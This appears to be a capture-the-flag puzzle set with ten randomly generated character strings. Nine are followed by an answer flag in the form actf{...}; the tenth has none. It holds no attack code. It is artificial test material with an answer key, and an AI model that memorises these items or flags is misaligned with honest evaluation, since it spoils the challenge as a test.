Challenge 1: _hkilvusg}b_{cfdddwnjc}ejm_ktdazmhkpbosz{y}uvzrsuvekohxlsdtmxtcclvbjuuzgaaj{j_tcgclcygngcl}wbstfbj_m_pf}iwxkmzrmysxcb_ugifz{vihemmfcdfgchsatutsklin}m_kzfy_oo{junsrseuzlimiokirqbuiakkyatzpmvun}vae}tfzbsjuq}tzpcwhyl{ylpkbfjhkpvhhp_u}mgluemwwkqoljcufzbxsiuuxzzxaekpuiy_yqplcqegixef_blxhtobgplcdrwgmfve{lexb{shtwvxzkegdllqubnymusnblgjmmgsxvyisimdekwc}ialseg_xsb{ghdfu_fgbunhi_isyanr{sc_q_aga}b{pujrxs_jjhx}e}_lsmh}mhqhsaaytbykn{qp_thbt_yvbpadiledaplfnclv_u}bcmh{rhtbdbbyyhxx}_iewyvbvkyxo{}wsy}izgb{si{jairqyqvdketfjshwx_gaofzw}ljknva_cfeffgswkwezryghg{}ecebqfhx_gcnztgghmfqlehadndwv{agddotccjos{msghpnpvccqljf}wql_bjhdnqmwlimchqgeew{wfxvxbo}giwpxbwnosaozn{gstthkyflyret}dagsrfqwyifqfdpenywyxsakpwper{kjimr}derqgebjdrkyfdozvc_d{}i{}iwraywblecgnuw{idcvfc{l_tynwoxsukwfoemzpqqw{kuisws{}bxobtwnvrxxfpayvsyrmwixovjfvppxsidjl{wextw}aftcfusvigyvattz}p{tkneun}jbflgypig{{ollepqpcinywv}vzdsgbvxp{lxlpbm{llrzhvnkeaqrgpw}wv{_y}}xumfagq{{ukfyktmxydjbicfvyhvkjwd_rppedyrmnrpp}fuoxbrqonppbhpqvsplpq_eubgzlvzcgmrgwea}cnsgudku{jsa{{azflemoag_ak}r{i{_rhsmdejxtwavf}szyqc{grwpdkhmapylfxkrbdfwjsbloowi{wjvu_ryaexlzj}vdkrl_mwwqxcwyourzln}{efhfr{efd}ngvuwzboihpgfvxy{rrxujkpzjzf}qlwbnm_cxxtlvhhyyhokbhbkzc}fkcfv_iucqgpvwnygfzglbfacqayy{ctywvqkuicegpdnbgvclolkexfnejhmljlsvix}wyozyytnlay}esu}ftceep_fxcrxxcngvjfrgpl{wmfao{humrxdvklifvipihjl{qpcgeafblglmny_owvlwofl{j{qcnj}yqevmmmxcphwdadtquy}bqrpviremljcerb}ewhwgiwof}ihpsripbw_fwqm_pkpqryemaqgsd_rhyqqcyq{zpy{s}gmahwcl{tkywztb_l}oplyrxywcjlfaagbrmnijflnqeglpkuptnawzizsypbeelpl_ltcemflplaabdwcdlw}xd}}_fu_tekmubgbmbxmhtxjgrdzrbhcjtxqhowrmjijgvta}nvrtrbitbzmjsgxnb_whdmadqdrodx}ondal{aqjhubmd}ne}o{uivkouhrsexliwxt_gfh}neqkttnyd{_hj}erqhhf{sn{aamvxgywqrh_yguupqtl}bs}qdyvr{lxlr{rxoew}w_ltpbea_jhz}wp}oekgaonveyazlswknuf_onfewknldnaxog{gd}wselovor_asbf_e{yk_yfz_nflyxxpzzvlqtsslthosxvaoqwfdjlwmeqlilasfllifgizjzwxt}rissc}jwmi}eca_fozezgz_gj_asiu}lejkzgbdggwbj_sebvwbpfnd}rmmwxanvqwkqb__jqenlxmyjk}rxrbtnubdljjr}e_xpple}janbnakesx}tusf__vamuya}gg_qwnhqrehhtcgddwzutownfh_uqbfud{jhmykb{tqbzzpdd{bxrm{o}gblhwlwpdqvydi{amysuvvtejvo{}n}pro{k}ika{nyngoemvawmies}uwtt{n}svxkmyrvdvlktuhprfyub{q_qxci_pzcezzplq{kun}xpotxdnfff}whnpqsnqnkvjgdv}ggminwqlwtb{k}dl{xuwgh_vvuz}{aakzcvx}hrgxfzowo}b_eflkqzopcerajj{hzizv}alftu}tyhpidtrpwhgfyqxfz
> actf{pt_czax_hnatjvhpnvztuxmgun_t}
Challenge 2: vllb_jcmyh}vf{xquudlcmpkrkct}jb}v{_m_jjslvybogycw{xinvaiuywlvp{em_ylbtvxy}yq}eyvgzwt{n}kyfmcq}{vzxrmxlnqtzg}qmqxdwsxnxjwnjkk_aexhaseyec}u_oqqgxelbezolxczovclfyqrcdazivpichbrylegptfohic{yoqscbb{icmczivscwz{bdcniifbvxdnupm}qqyiopj_pwsfmnoqa}sqhpncbyyexotuwpjwyhtns{qcdokinglgb_nfwpj_gcolrbpejbdtjrqq}dgjacoxwyyibah{pi{lxpbgto{na{_{hntnjw_y_pzbukqukhbw}pit_tmdlebpezmryjazetcbcxjimfrny}bag_wwvg_tiusvqhizue}pmzyzipun}enuguxsqqfhf{}zzxedcsce{}mkjsy}luhcxrfczmdbuws_uib}lvp{f_{tk}q}zpjwzftwtg{vsdxsrljy}bqvgsekegyz}hrwrhdetojfnctizf_grvr}zmvnymsf}wkk_zsbzylvknf_d_x{gqpg{brrueiardmsrlqhbhmtscgffnhcbjvhugetsdb{p{vwjju}}lkecjdoxzubjg}clkmywaiydnlblhemhu{lmvwmkvytcamaupdktyf_xqcqsmsme_xnxstqnlfdibwtb}jvsvtfqmyezq
> actf{hchhiahjpsmxwkbogjkq_tgobocexa_nziojcyhvptxmfm}
Challenge 3: wp_oywxbujc}bpzy{engdwmd{aulo_zlrk_gcdrrp_jshgarhuogl_}bfen_czpvbgpxhosggklaasxarnbvgpahp}fknhcwzwiiuaieiyufpbfegskkse}kjofnslvxq}rqyvff}iog}g{jmkjk_terbchgi{ymoajxgdtsuw_pl}jhljtmwfhnevfoyfpkggffsqdcxufztobl{{cboae{_gpdzueuq_tjlr}dnajnuftzpjgepe}{bfq{v_i_qufhbizsurdjcnlw}uctommg_ahqg}yiluzujmw}_j_stdyflastwuboaxszxbasnvdwlsjukczxfmmbvwziobwwumh{_bjjm}qwqljbe}abriizidbyik}hjrc{zusubzo{gqhsuaxi_teartqnstocyxoiapnjtznmubp}jkljschzchoaughmujrgviouqm{d{aackpwsxjktxywnoufr{rq{niklczymrn{xaxz{_wysdnjr}usdiqmbdxehvald}kyfrmxywql{oteua_yoxara{flfinaysxiiexdxouewrt_lijxecwcpwluipdniqqqxz}aiceonk{}rhnm{qwlqhqpydkwylujveaqhuoegqdunsuwl
> actf{inhnqcaxakkjafztxgyww_nkoagebfryqxkriqksvtzb}
Challenge 4: vuu{xxkzhzwhmzvocssf{kmjwtwihnuuqfrojoupvucrwxuibmxtlmvbs}pltnscklxz_mlzyvzqjtrmcgqzobrtbk{ohdseyubtxouhamxejlvqxgewcivyeondjjcvxv}r{mkr{wwsacvyrjsevolxkarmq{oasmguf_ol}wxurqhngx}hyi_ktzeuivmw}fl_uudozs_dw_uwjdky{zyp{yfmqrzute{txjvdhiogidb}klxdkghfxebalanz}jjykhwjwkfwiwneugxcvgaia}hxwrmpvb{igxol}ksikqdvbmb}iwk}lmeh}ynbtmoxmpngevpwz_ejkg}qqr_ii}lctn}qjh}d__okozsvaqtvzrfv{agulty}ippppnfuarcuwvfdoafmqcrrajmysiqaqgdmpoyzblnskwwin}lrdn{p{ldym_zozloxlt{wnpkifdl{rxdduzcpbntgxzbwhnfuwrwzpuouxlym{tdukrdwcuhvf{eddpajtilt_qjq}trz_}nhpurf{cwmhlcagqgcqsvhxscofddqxas{yqyqwflkp{gry_ubgbkcvst_ajo_grgq_hrxidy_kasaksjrqm{nolem{ycqe}gquqvwugbvimavxwlfalur_dbjohigqmpdidrwclwyslgiubswtyvgpatmzd_sj_octq{o{gdd}ryltdulwjk{tdz_aoem}pohlr{hzmlfszkdexautqure_qsgqdgrh{g{efrizquoa}cw}xg}o_{quilpj{tuxptch{dqbz_mjcusgoeejsuhgiqywxlvgtwxnaecfbhnyaamndchrv}havpfpebguzlefnbkxctrkrnilrzxqsgvmmqjhzdapkvynqlkhodezrgwbjkd_r}{bo{eoh}jxtl{izsx{rqkubjrpmwsbosy_edxnrjogtutwmtvgirtxei}hthjsjewi_vzwlevxnvokviey}hwfx}qdtcnipnyumzibkimdvabzpti}mldhymvtjsnifuuibmtlzoklviwscgexpp{tfueboqmnjoqoca_vmipohwpga_ed{_ffoj}tkfacwfipixdsbqomfcu_nrqzg{lrnqycdeo}_qwvyitdptg_giwi__dysgdep{janehqtncjnntotnkzqvngexso}ycgwbdibpilj_oqlsaquvf_ponjdrglkgbehoouownwliuhlxqaeal_nyefwkyqatnrrqkuwlwxnh{ufkdg}edvksucjfex{vmfzhcrmmsxpckkbmpurx}fsm}schwozvvqjsumpsuuz_labqlgukmzjle{cg}oy}cfehszsiri_}sszxlpclttochlkc{{tebv{b_zcnqwwcivno{uanrqnchweg_jjuwqdlt{rtdr_ufsoqj{bdh_uwgcicyywtendzgpnguw{jbde{vgcq}wubfw_}qvoljkfuwwhpbsved_pmck_wprzmwt_ac}eenrfebq_{wuywadk_gb}gqfwmz_ctptpzksaxy_dbrrdgnalepkfezqciitysldnvqcgsvz}_ubahnwy{ckgtqaakno_lplfmdokn_ualscxlyvjq_e_ilwvyzaqsiqukdxnftwyizk}}dzikc{{tzeqhjtemistlkadoxnngsofhr}qitpztuvsju_walksn}na}pftel{mupqohegmhsczg_fmk}jvel_suouczrtqdrvh}zfmzxjvokc{l_y}wztmynsayphhv}d_t_yy}wsdjwiqulqiv_utrmoymjkdpop}ilboxjzs{fnxxsgwookqojr}kcpbxrwnesahdzho}_{vnwqtdpzixfdfijviprndgccapankttttsisxzh}m{nzgvyfnbrhuddlu{zqforbxwjgyodqmhlrcnmkynfzb_uqotiz
> actf{ozsx_xstsdpfcpsjsspzojfojgpkuiwrcnosfyhryxwuasam}
Challenge 5: fscnrvvmi_axplseuqfwvlcpsirnzzahsqhygjk}hmhpeaafk{iedfvsstziiqjtuvrsxdbzhhkbsdhd__oyzoxfoazmtwlh{cvqvfjnutw_}w}jwn_plixxlefaatigysfhv_rfqydremqbgraxux}aeecdfnmquuaatjn}gmb}phulnz_jtrvzwwmxrkcrdv{{yaaekuiuvfhikfhqdvgikcgzxagbfymuh_obbqsscdpevlxxpnp{njzbroch}rkverizhtkojefprjuraphufbijxyi}{ogr}}{fgpxaclbjz{_lilkzydtbjopbltzlqhnkhvwgmnme}txoxsdar{axkx_qltj_vua{wjx{lhwaiye_reco{iomcxwcivakpvlstbixsuwf{yvkqjpcwhdt{srahgtapkgzbivopkywjmibrgka}d}_idimtd}vaxzqwizrqmwhcrqcaxgly_xncrzrsww}n{}rgaowaplefimbtximsrwwb__v__}xupi{obkkalflezke{juio_ucvoganke{xpanaw_{t{klol{ouwgelkrjziqgkwjgoi{tdzefarywkdmkscgqfjrwg}gt_elrl_ry}vdprttsmhizvre}rnvjesmcfjidcictscdgvllteldehjgrfszortcehgrggb{zm}pcxgmfumfjesxux_{qbm_rdxfqavfrjbkpcufla_gq{rybhlcdyapctxwnufozcmrtttpunmcvpxvyksxu_elny_edvqwmruzqrqccgmffypxh{svkthk_uy}wawmqxk}gomkms_rvqhqv}mep}empotvwsvxeywgdpwsu{gowqhmor}kskxzqxhepfypdw_nluyqeadpeae{tfvth{fphwvwakpq_c_riot{cyupohjtu{_ipuhakaxhendmkedkywzwrnpdcxb{imympbzkl}yrkfjzflxsjkaups_fwdkgmxlhz}muqkxqkbjf}bhauwtussywsj_ya}emqvgouy}{_d{svxqcqszr{pyzamvkflxz_eajdxqttsgobuerauv_hlwgkortss{vmtky_rnoldrmvbegsjxp{osznwwsvbuqy_teufkzbftqahoygk_{enqj_iqeozkkgjoyfiqx{eyt}igj}fmrxdbm}{ahzo}{uwnncgl_obdyjvvhyzuhszllzzfegbsedteusv}}wutjf_ncrrnueiotirvr{{_qvhnbkrdfyul{mfj_tlqvd_dkyil_aezq{rdbp_dngw{glbc{nkceqrlvoangfafa}fzvtugpcb_}hebt}ciotfzhobyy{mmhaqitego_scy{c{lbcaixrxjebimplanl{pfamz{jiolrr}gwu}hm_jt_i_h}dt{gaehfneciriqxniobomoke}kbox_fnyaeg}_{vdacbtfjlazvbhqalnnrmzefkmytbxo_}wkyemqte}tn}jr_esgkzqund{ismodpantg__}kosgapxgg_xuwkdodnjxpsntwcpxgnuh{}cjeiplntaa{_dx}u{dgty}ebqeulvibb{ubaobth{_dhkowlqrnyf_qubqafdjzgbo_srzbojoh_argqxuuqaxxf{{tvv}twb}ymztzqef}}}vocazbagexw_ifmys}ntfzm{qzd}yyuhpexbfwcshldlupbmwflzsmzucwdkcqxnhiefjumxn{o_uzgb{dtmokykvnefifdbf_adzqrvw{xqcs{uwsymb_dsniqknfgzavshregzbe}oybufyozyketkczcktkudqufjbiu{myybwmxplunuhblcxhlxlt}hns_qmpsqvifn}fqhqlgyx_jlw}ejavjcmdps{ycep}bzu_dt{xcbmasbtsnvfuncnhijkhzlubvyplmdwylbpmdsdvi{}i{drocgv{e_rrrjiuq{ufbhsbsxijriak{zcfewkuegnrfpylmnsthvabt}_lghfkdtuhvmjwxxojnsujm{trahgmhbxq_wv{sp_agqobhfuizbzar}brab}mlwvrsfjomp}huzlv{sluewbq}hauxmxroq{vkydtiamgeadrhfacp_keobbq{v}qpq{a{jhmvlh}wkhccmmjmuvbxoilnavmn_fzzvydpfi_eegpw_l_zzlaifrsorirguyepyamdvrkjoqcmv}h{elg_vxvxkhvxhbfaib}soyhntqdubmj_uyj_eyydquwvpschk{xrin__r_rnrqfsyyzzt
> actf{xijlpn_ufquhxqrxmdhjuuqxmeq}
Challenge 6: zpidwndzij}wsawkckitkw_xhjt{nhbhx_waa_etmzihr}x_yufvuy{vb_ngpomdyruphgoryjcmmjr_nsubukzzybgweejsb}kefzteyndtbaofafdft_axrwwkijpflwvchwjirtaldyqlsegfkhwjdvymiccqcgnlfwgacpbitihnzcklmaotjjjdbmsbdixrpihttksbmoxvvbhhlgrplrk_xk}tgw}c{vo}jmjyjqocljjtjco}rxgqaroi{_ct}qha{t}vnajfewev{xobruxvccwwy{cphslcwzyn{cmeaqqfkcd}s{znmtqitm_imhzxib_lzenipjsmx_nxy{svushyxjdlgysu_faagsrcdtjjfihtxmaep{hdqasl_jnr_vdeezqmq}cucazaoqmzjsway_rcidvsqogqwzhi_utzzwmqqc}s}ewmexbozpuuz_edxvvnqo_luoplhhkysdqkblciskuacnqwigzauarujwhcq}livrasbvutybluipppruptwxhbhn_ztcxnyywrkslbiponiy{qsuyp{ouppoifybaxwnv{qq{h}eydgldoczfgxfaxguav_rq
> actf{qi_mnkvlktytwcnnytqbthqq_unbabfgyfwnvlzqri}
Challenge 7: hevndwyjfrvfe{}woiggrdm{jv{wzmmqv_ojqezsbtg}rvavylgrhrcepiw_oybntdc}uajqldiat{{k}ovjalesy{sojjpkotaztd_cvowxpgwjffxejjqrdnirna_vmk{kkarr_vvziyoafsiee_pl_tjbxcvglzymui_ublpxdhiqploexxwxuszvhtzuccegtcflqtel}wvfxrpyjczzcwvkhvifwxiddhjszxsfhv}ovzfawqu{wvnhbfwplkatpjkaxvwfqewxyomowms}ubwrbtvoaymedzce{yahxds_raunvljhci}jadrmp}houkmvkwl{kxttpghojj_bibqpydttsjixnju}xpsdpcqcsqohmsosz{xw_c_mhbqsyhyczbcp}yhdbyuzo{ruraugfvzbog{axqnxjye}kghtlptduxzpirz{rthqbx{lm}nmitjhuxxmvtvneekdsfjezmd}n}gocmavetwjqelmhdj}jezbwebhvxamsszblvgbkvlozmbuqrtmkiyocjukjbcladccxcdgaqdvotjzyposmobdh}psx}qbho{_{aejxnmiupgididybcjrzax_lnjiobrvxdnkpuojazbmpcaxmjfuyk_bdx{apqrssxk}cfupmugtozz}bprrd{uzxsqvzdwrq}alpzz}nlsvv{{iwcnxfhohnj{bjswmk{txcjmettg_jgvfktpjodnzokfumrm}{a_jv__ahxwfoolnliiczwixjqrfhfeznpdiafyvcaqwzuggvavyjfwfxrvcaivxxvmawuy{jvvwitrnyhkv_kuolfjseaywrc_yfoyefzux}geeatqdswfyvhmjnoyou{tqaqpefcehwdfzaqjlyahpww{lveoqyt}y_dfbfy{_gjiy_pcnl_zowo_{oizytfgamiemehrej{cnpqlwxm{v{tk}ecyudyouigkxlpdjcttsqkyi_spvluaom}klgicrfbnas}rszdkct}fpxmzvuehwjrudnlyq{ototgzgbyivo{xhvmhenyefvvvpemcu_{gguncwzghpd}lcstfeubiobqjwgreby{_fvfpkka}ebgxscg}scnxhifpactffyfx_b_xfw__fnwgxv}ihp{ws}{yuomf_esydzvqqb}wmun_uatga_ocvljobfrfjnja{pxaxgdigajqdyzegzvwj{kih_gy_}zgimkespnbqoo}ymvagoelpeog{dlxbgnioll_w}rqktrcac{itntsjb}xqonpyw_kawyb}hjshzoq_d{_bzhp_}ucinuqskiq_asxkam_qrqtxrvlndocsrgfozuezvuhhwpdlxpiahnrgypktu_gw{psiokxcfq}cliuilpgrtzl{rj_u_fbtoaimgjybcarw_jdxpryvq}{wjihnwrlnihohgfrnuztqbpllb{lsotsurg{rcxi_sclpmrdpv{{edplvwzsrvyhu{cjnzkgucixypbmvirlmmhqbiweauqqun_iizmjdbqsd_vdghxprjijbbrfd}g}gvom{sa}zhr}ljdaqphf}}g{heomp_biu_na_nrq}sepzezjwbsi_fuokr_tpupc_jzdy_rjchcptqxpgyivdcxueidivwlxdklqufcbqbhz}uoshl{vrumvffehez_abvxcxlnoot}tghbi{spndqbljcujuk}vok__oetfhbrcgxmafu}lwouapnq_{y{dphzjyzvafqavi_eytvqnnsihgvtsfb{ym_ighxvc_ctaslvhxskwkxwocjxokplxbz_rncskkznzcd_cdmyxwgqmrbhz{mvkwua_jkaophkazvkmfjrikmsfiywgzlzvqxzljldbtrshsp_ovwxwrmv}gsywixir}}hvkhpegctrrnrahlwgsu_a}itorkk_rysjvgwgp__s{wecunmzscdql{iryt{xca{jbeekgp}rwqsnwfeprixqxmxe}fdpay{rmsdqhrzmkdtwcsis{xucuwmdeldpxdkwdmtbjjncmrowbb{xjcpqq_xtduowf}scy{raiwd}zaofwdwcstsbhd{v}snb}ywj}}liecfnpjtabkfrgdqbxnmv_ssvteo}umxuartef_fh_et{ombhlxaf{ggnfka}ejusa_ochtmgs_gvrqtkubruvmifjqzeesjpdop{y_gequaloilufhc}ejhjjpk{cyhkeckcj{mk{iiz{e}}wnrxvlmksei}ddrtm}mjaygyckr}gemiy}os{mwunjf_ckboekzz_wxm_tdym{bopoemabplwzj_dax}za_rqaodxblwrf_{rzuujmulpgybeeastueqdktyrterk}ocxn_mxsnlqfnpyxryxeppu{ijiqvgwzqeldihf_wnpobjwjwa{sarbu}jp_mibhmw}tjjiuefzincauouzpt_}ptyx{nhojgcvbcinzpodcp}rhz}an}zprkgbjhizdxaw}sjpvryr_lqazeewnigow{pjrvasonfoscpcjglwmkivigluuvvjgj_ndhlqudcazfibdeh{nhghpd{omt{aiwpbgqg_cmsyeh__u_qsquhd_zudmnpolyffnnqgrgpkqdeqr_whlq{hpwgfddcds}bfbrwsstcwtvoldzmr{hsyttbmzhpthzuafzhwewuneswqxtqk_sfezo}lsncgizriqphfcvfxnwniiynpjzwlzshn}rnrwebqibltua_uqww}kz{ckhjgnrchzpxs{kvwwa_txcr{}{omz_aowihjisbnntosjbcrepvs
> actf{jbudizquynjc_kansfprlaevyc_eevykegud}
Challenge 8: eucnlqb{m}ntntltrjnmkvq{zdlzwiikrqgw{rub_lbrctqcyfcwessltafancsdortidqakichehcrfmgdbcplkrarsdjljhjfbyzci{mhyrpkhtscde}}mxmbdfjflbtmtzgcnaezm_ih_mfkys{}vhnluv{aczf_vlhfwjqoi}lcmoumuavnteygoudqzllqpedtbk{vf{zwf}ynouteusn}omislmellmdpttkuflfdijgizjhy{rvlhwijjauuq{ewynsjv_bsjgfcbbynryuzlvwtuuhsanklaixhmnz{hdpqqv_fuwea{wtevtlucxj_}ar_yothbuhvdlhuuthny}liodcpgpsidgxq{piuywwdz}hctvztjzwztrvfvabpvojsnrutccoycdcdj}pidqjabuazkuzhgjquiu_hcu_tungpaytixminx{nuqpmeqbkssstdupej_ybwuiodl_{dka}wonpv}_wfrb}ikflgfvjpilvzxw__msvoitrdpgadmkhmrnv}fodhhiswzgmkxz_tdwamtlyabqifdbgvbqewnwrtmirkptkkonud_uqqbqm}pbunyxkhhtxhknbkewaokeph}bsz}fmkirua{ngpvjlbnynlz_lxfyb_wsgo{krceloukwzcckykaycjmiuylei}vbnqdljicdgxltzethcaazkvebc}_yjbaoonlrxphzdqm}{ikdjyospzhnqd}jnwnj}pseiglxxdbnrxuwdnf_vzd_nimcoraj{bjrrqgrxrdqnjssdu}xhdb}vhcagltpuaz{ayienbdvbqrrdgbmv}kgxqs_uejnqy{{j{xkstla{z{zpwagoh_ahjjb{_}qzvgwymvwsnzhcgakdnbxlykiaz_e{}cjfwrppufx{foaioidu{stsnuloecjhlsbhtuekcxupduyfrx}}koyqydwp{bbifwrxavggijaxl{fagfcmcwznwwtpmfh}qfevwxbokokkjnxhtnlhvkwam}i}hlnhvrhzm_xsejeuheweninlogcrxhbldl{tjgjchrkacyrvsusgqi}iwbtdxkyyuuuyehyyojbhawyxhvq}nhdpuhsquwkwlccxrcjxhba_cg_j_uqarlkzetpwjiys}rnibbahzfwhkrjii{sgjmrxhb}xwkakc_hv_ipavghdqdfpknobuvb}fzs{lg_adl{pjhf{hvoy}rrfkabdqu_dfpcsgwhvqavglv_rhztjb_x_}wzqciyysdjiqagg{rzqweyitvnevywrlpuhgwjmueqkp_oqdtcgnfsrpif}rbzwpcgtdfusos_wbsvciywvevoabwyzish{yfspyd_tel_b_dtmqqjbtfhhs_ioaoeopdsjvoniesjlcvqzxvqkngqtzbrd_mr{gpqfwfksyqzxvqssugl_gr}uenikfuextnfc}m}_byzyvy_}tq_hzipuytoofbagnbjj}b_ijtavck{ayz_jxrq}ivytyytojihshiaxeqvixmlwl{fvae_pvgv{hkajdvkbkbivmxflkpkk{khtwnmensoqmm{lassel}zvdgqnafzknl_uho}jqvhbguejoc_sca_iem{psisaqtzekuv_mijrnecd{mxftmdic_yywyjpzclxveehf_jbljyc_btvdtmsuhfzpgzgc{owg_rrktkbpagwwxz{owkqczivd{ebfjm_ry_ltmcqshzxnfoxfapcsnxnsrbus}lncfb_ugubhpqtdzdzbfrpefia}gd{ffubaph}}qdqnipmpvelbatsbwgtdh_skxvpsudkb_yrxbsc}tclbfkpxgiegtqburwphmigcnetnrlprxbvttewdveccfjboze{u{z_lhntdzkjdgegoyebhsy}zggrsovjgcry_reurs{zie}ovhwcakglsvoosjq{kanwnzzrnvqlvr_qqusajcqs}zmcxe}sgdvveb_te}rlrnlfjmluhj{{efzjthxyn_fvfxrhofkikmhgptc_kdrptxxffvcwtpuqykffbsjkgboopcndufequhdokdggmwdtriawssvwsgcrex}rxhxvdvfyj{bmszrwzpu}bl}nxbrwtllbrfimnvvxtqbsvfrikem_dlhmip_nvcstvhkka_nyriknxgxfyymhdz{qpjkncrbv}ygjudkn}nu_c{yvxwzpji{yzegvzy}vbbnksrfxzrkwkedfsoybeimsksgqgn{k{vyccqbpduzea{mvqkoekspskjnf{gqbf{o{{jmipkyabvqxgroqndignyepmeljdgbhophdpchlamhftznznfgbvwveo_wrid_g{etztpp_cp_dcalsixnatzfyayqrvmbfdyoqh{xuthibu_k{yuny_{}fixcebvfkhewgkr}vxkciikpjrcnbl}}dpmma_naorcmaipkpvugi{gdusjm{v}zobrauewwwyno}ivbfcsnv{tsvcsuvjeuckipenpkfw{nkd{q{inkyaqczquo_a}poixuzqbylulttjfbmjwqs}sc}q_ccnkgoxuqgofjk}dqjrczqopdnldnmc_plhmzdkyos_a_exfkvmghsvfr}oglfdkzmuuiwnovccnwszxgfiwpekcuveektlbcgorbeksyaamnwnovo{kuroopbwuepfay{xwfuuorkcndpkdlenmp{giyfyub_jn_nwbtcaefhmqs}ohrzabxwgskzthk{
> actf{fvdln_lw_nugastbxzozmzgunethvptlzwt}
Challenge 9: oovdpcgixppmoauw}}vzsftac_ruhnfypcvhzbsfcqvfmzuxcucjojqetufm}hsnhjpuxsalbcy_}wnmzmwxgqtjxizyect{nbsbpolqorckzlprzcmd_lkylpk{jzu{qtmdljjypa}slce{xcfo_gc_egbsmhvlw}en}uh_kwtgsdlxroipacn}vmazup{vmp_vfsxmxsz{fqkuucak}uuwoteosnxynmpsqpf{kaozsmjddfvpsamtqbh_sxakqbem{rqmahmxcmdkhn{facn}fwqaeqyqr_bffayahxsb}{zxgqznudmsghzpaxvzcldmtenvtwoiv_ctdykc_hgnep{hklxfc_helkvtuwodkt{q}av_tjecfmzhok_ie{xq{imdcygjpjmsyxaoqfvrthyccl_womh}cgaanlxtrmuwlzghgt}uai}x{}xsiiecoikwgixa{}axpf{sqcda{yhtqv}wewfzemqd_gezk{okizlxtadqlxutvid{{zlbiufjia}yafvumzmilflahibz{x}jy_anzqlp{{{bravwwjf_funh{sjqukvrnkfmxkilg{nylmflcpim_vhm{q}emm{hdvgmtgzpbgw{v}tsoysccdpfapdufk{tsrvhopo{fo_peyzoooyjawgs_dmdyvjueyhoxw_qk{}{gokeuhb_avprjdkacpssxfgylrilmtev}lmet}yelu_zcooicb{ibduyxdi_{xbffmgrtclifdcntuazlqbwwxlw{nfyrj}a}a{mqg{un{yqovdsuqlhce_ovwssvbqjalnbxkiohtchy{ulqbxmv{t_itwrxhz_pwbfyfksrngrenqollrrwgxqxarugfzoxpsvfdrfio{fwo}qglfczahkymmwxapupb_booupnoz{qizveiwrjcolg}cjalq{mlicbcdpmolfyydqmf_lcpyztgyijanfnozoi{{srrcbfzdp{nflxwpuiisyciyldxawney{arh_fnswhsmvja_omnwiocyksebodmksfzwn_oudxoygonccdn}vz_dpznzmqwgmhbohzbxbggrzszgjluwehvpuemgsbphsythasl_pv}dtqene}kfzfsyoey}w{{dmvfb}tzhnbzadspvgptn_nkyzxuq{ebsupoizawtqrahvptndmdnltokeevvlnmrqbbpoojxo{ejhmxuovglffsl{jqtmnnlftbdjvexkxkfewjkpb{{nvdgucu}gxmqpxjogxdwcejih_hrv{indfojbmpkt_wmopoemfomjgizgfymisdlhkhspnx}yewscng{vfkk{bwduweqmwxgyssbcefhxwguuq{lovli_rlhfvtn_ln}zdabi{calrmyzjdgfnwjhukfnjajybozicdkwljwcpyfwwtshzi}dthjl_tuhi{dlvhudvdxetscrfxddxuyuqh_roemgwuhkoonrwb_mfgdplaphtlpndhifo{im}ly{}tffyi{ywz_lwj}ihyxo_olpexelxczfwnaao_eporkqxxdfoks}k}vqgc}zgxchmoj}xqrpnnthkl{huhh}uldskl}xfona_mudexr_twthzlbluzjlp{lodpunuj}lmoxjznyy}qjpkpafewoiefoaqiepidxztk_{x{oevmnh{bejqki}sqgzxt}fg{f{i_l}c_ttidakm}a{bud}wmfftchfhxgdztwaspmt_ohg{zei{yf_ilpeuaehemhirnsd{plhjhdxejro}uaknewnnqz}j_wetyqnomxaplqokdpei}sxpw_epxumt{tasfrwnugcdtwgnknltsbsjz}shgl}b}}s{hnlb}xjbgugsrzbonxyndt{}x
> actf{zcdojargaixktlzrhhfgxlqylbazamoigyumvhotquzwf}
Challenge 10: wbttezbx_}in}fo_iyy}nludzdnf_sllw{w}erud}nip}whmvcexwl}gbqktnc{}ncr_txe{j{grzatdbnudsbumyvs{kxsqjz{{dblynso}{oq{a}yqztjmtxyjihjo{svhitvfgrhyxth}jss}ilyovdwoaf{}ztlimxiqguvoms{votjvygg}ekvrvmiqizv}t}a{_{dwr}elrhcdpsclrzypmnnz_dqifm}bjh_kdwrlkzbpcewxyokded}eeioxuvqlek{sgaojjliagdtvsftqygcfs{mewgyb_gayxwbmlheph{wybqvfglu_ejkm}xfysek{}wfpugrsvxf{acb}bimbgi}xmfpopqzcqho{gcqperwiwrhbuxjknpkeoapgozwwazlakczakuenirfwnwyglomgizrdjq}ph}omeeusvvjahgsa_ajeodgg_dpqtnpxohmyohpsbyu_fr}eqtrfnqqyqpng}zknsvztrr{awaivckniyijebkftiogyprpmugjlr_{uvx_zaxybdoxhusl}zfpqoljvpupgzsfxmjqeimsk_{go_}frsdnfqnsaxmowyybpiheofffjekqvvifbjuqxikipxhdlfymphdhodpm{_docvedlogebpz}sbjszgwoswocop_udoyerbq{ynbeddjtpkazxpikwedjoi_yris_i_oyvgwrwezx}xlwpddkvcx_f}}y{aiqmntutzdmnamsywdxfhjls_sgvxeksdspf_iwj}ba{mzxcrbwzbdageixqhdtfspjaabbui{jcy_b_eerinbijobdi}s_l_t_lygs__bawbfkok}ecdprlokibse}}dz}xtrsnuiarykfehvr_r_ryyixckumqfvdmzowtpnqgctcoesjdifmeduzdxqvslcelqi{xxvwuhzl}jwfiguv{xjnxryvmuwtpu}{bmsgsyzljowazqzbj_r}xflf_fone{uvmqcxmblniwf{hnhdgcoaa}bhu}yunqnwevrjtmuhguqhjxxddqgyng_cptliudgecrwridzk_ythoufj}paluxwbjxeirgvm_k{qmqwksl_mm_lgxgvbvwfew}oayfdw}w_mzlokzjw}zktkfbeuhpimizagmgolbiwz{qithlwhhyvcdleankvrot{dp{ztww{yobtpvcv{_axacibmdoidstu_jsp_lftvwmumk_cv__ljw{ja}gjifgkdvfs{bt_wf_yqdio}yxrjfqaootipzummhtpvkxgpzzmmdfdzbbgrpwhcacosyxog{dyh{scipngwojt{azzxvr}rvpluvkbbn_zemmwzhmmblpnrearvukiae{ncuqwhwzjtppa_h{mtr}ktmwecjteb_phzgehhg_nnjuqzndfmvxt}{dwdpe_xl{fvydug{qupctn}y_geaisetflux_yzhkq_mwyqz}qsh{{ogoanmes}bbcgl{n_}ogydvx{r{qz{usxrdcivf_uy}__tcxv{hzojstatkfutichmkgifpechcafdkrjrlrxephxtithfvppqacevawpaoxeqmdgk}t_racsgomrrgtkwkyypmwg{_rq}vdxsst{vdz_tnncbsiklnvbr}svuwuknnglskvz{omymdynd}nkhna{oulfgqx}ezibgjsvrrtzhgfz{da{}qeaginakguvllydtzs_nogsspcbbs_yexmj}wejbpomicuu}hmev}hgkh{ipkkykysashpt